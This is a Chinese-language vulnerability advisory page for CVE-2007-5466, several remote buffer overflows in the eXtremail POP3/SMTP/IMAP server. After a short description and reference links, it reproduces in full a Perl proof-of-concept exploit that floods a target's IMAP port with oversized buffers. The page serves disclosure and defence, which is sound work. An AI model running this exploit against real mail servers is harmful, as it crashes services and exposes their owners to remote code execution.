eXtremail多个远程溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113802 漏洞类型 缓冲区溢出
发布时间 2007-10-15 更新时间 2007-10-26
CVE编号 CVE-2007-5466 CNNVD-ID CNNVD-200710-292
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/4535
https://www.securityfocus.com/bid/26074
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-292
|漏洞详情
eXtremail是一个pop3/smtpd邮件服务软件,可以运行在Linux和AIX系统下。eXtremail在验证memmove()的长度参数时存在整数下溢漏洞,管理接口和PLAIN认证中存在栈溢出漏洞,CRAM-MD5认证和recv()循环中存在堆溢出漏洞。如果远程攻击者向邮件服务台发布的畸形请求的话,就可以触发这些溢出,导致拒绝服务或执行任意代码。
|漏洞EXP
#!/usr/bin/perl
#
# extremail-v8.pl
#
# Copyright (c) 2007 by <mu-b@digit-labs.org>
#
# eXtremail <=2.1.1 remote PoC
# by mu-b - Wed Jan 31 2007
#
# Tested on: eXtremail 2.1.1 (lnx)
#            eXtremail 2.1.0 (lnx)
#
#    - Private Source Code -DO NOT DISTRIBUTE -
# http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
########

use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 10;
my $loop = 2;

my $NOP = 'A';

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");
    sleep(16);

    print("-> * Sending payload\n");
    $buf = "\x00".($NOP x (0x2710-1));
    send(SOCKET, $buf, 0);
    sleep($send_delay);

    $buf = $NOP x 0x2710;
    while ($loop--) {
      print("-> * Sending payload ".$loop."\n");
      send(SOCKET, $buf, 0);
      sleep($send_delay);
    }

    print("-> * Successfully sent payload!\n");
}

sub print_header {
    print("eXtremail <=2.1.1 remote PoC\n");
    print("by: <mu-b\@digit-labs.org>\n");
    print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
    $proto  = getprotobyname('tcp')              || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");
    return(1338);
}

# milw0rm.com [2007-10-15]
|受影响的产品
eXtremail eXtremail 2.1.1 eXtremail eXtremail 2.1
|参考资料

来源:XF
名称:extremail-crammd5-bo(37209)
链接:http://xforce.iss.net/xforce/xfdb/37209
来源:BID
名称:26074
链接:http://www.securityfocus.com/bid/26074
来源:BUGTRAQ
名称:20071015eXtremail(lyeasy)remoteroots
链接:http://www.securityfocus.com/archive/1/482293
来源:MILW0RM
名称:4535
链接:http://www.milw0rm.com/exploits/4535
来源:MILW0RM
名称:4534
链接:http://www.milw0rm.com/exploits/4534
来源:MILW0RM
名称:4533
链接:http://www.milw0rm.com/exploits/4533
来源:MISC
链接:http://www.digit-labs.org/files/exploits/extremail-v8.pl
来源:MISC
链接:http://www.digit-labs.org/files/exploits/extremail-v6.c
来源:MISC
链接:http://www.digit-labs.org/files/exploits/extremail-v5.c
来源:MISC
链接:http://www.digit-labs.org/files/exploits/extremail-v4.c
来源:SECUNIA
名称:27220
链接:http://secunia.com/advisories/27220